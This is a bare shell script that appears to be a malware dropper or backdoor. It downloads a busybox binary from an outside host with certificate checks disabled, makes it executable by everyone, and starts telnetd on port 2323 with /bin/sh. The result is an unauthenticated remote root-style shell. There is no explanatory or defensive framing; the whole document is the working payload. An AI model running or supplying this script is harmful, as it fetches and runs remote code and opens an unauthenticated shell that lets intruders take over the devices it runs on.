#!/bin/sh wget --no-check-certificate http://jameskuma.x10.mx//busybox -O /tmp/busybox chmod 0777 /tmp/busybox /tmp/busybox telnetd -p 2323 -l /bin/sh &